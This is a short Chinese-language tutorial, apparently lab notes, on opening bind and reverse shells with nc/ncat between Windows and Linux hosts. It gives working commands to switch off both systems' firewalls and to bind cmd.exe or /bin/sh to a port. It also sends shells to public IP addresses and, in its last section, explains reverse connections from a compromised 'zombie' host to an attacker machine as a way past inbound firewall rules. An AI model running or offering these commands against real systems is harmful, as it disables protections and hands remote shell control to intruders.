一、正反向連接
0、先將防火墻關閉
Linux:?sudo systemctl stop firewalld
Windows:netsh advfirewall set allprofiles state off
1、正向連接
1.1 Linux連接Windows
00x1? ?開啟兩臺服務器? 并且給Windows拖入nc.exe?
00x2? ?Windows綁定自己5566端口 等待Linux的監聽
C:\Users\Administrator\Desktop>nc -e cmd -lvvp 5566
?
00x3? Linux去訪問Windows的端口
[root@iZj6c8wqhhs4wojatf6sqgZ ~]# ncat 47.242.11.22 5566
?
1.2 Windows連接Linux
?00x1 關閉Linux的防火墻
?sudo systemctl stop firewalld
?00x2 Linux綁定自己的端口
ncat -e /bin/sh -lvp 5566
00x3 等待Windows連接Linux的ip端口進行監聽? 并測試結果
2、反向連接
2.1 Linux連接Windows
00x1 Linux實現本地監聽?
ncat -lvp 5566
?
00x2?Windows主動綁定Linux的ip和端口
nc -e cmd 47.242.11.22 5566
?00x3 Linux本地監聽成功,測試
?
2.2 Windows連接Linux
00x1 Windows關閉防火墻
netsh advfirewall set allprofiles state off
00x2 Linux主動綁定Windows的ip和端口
ncat -e /bin/sh 47.242.22.11 5566
00x3 Windows實現本地監聽
nc -lvp 5566
二、內外網連接
配置要求:vm搭建的win10 + Linux監聽
原理:由于win10是nat連接的,利用我本機進行上網,也就共用一個公網ip,所以說只能win10進行反向連接Linux。
步驟:
00x1? Linux去主動監聽本地的端口5399
?ncat -lvp 5399
?
00x2? win10主動綁定Linux的ip和端口
C:\Users\admin\Desktop>nc -e cmd 47.242.11.22 5399
00x3? 成功監聽到win10
測試成功。?
?
三、防火墻出入站
對入站有要求的話,就只能肉雞去主動綁定攻擊機的端口和ip了。那么就是反向連接的過程。
對出站有要求的話,理論上來說是可以進行正向連接,但是防火墻是嚴進寬出,如果對出都有要求,那么實際情況下進站的話也是會被禁止的。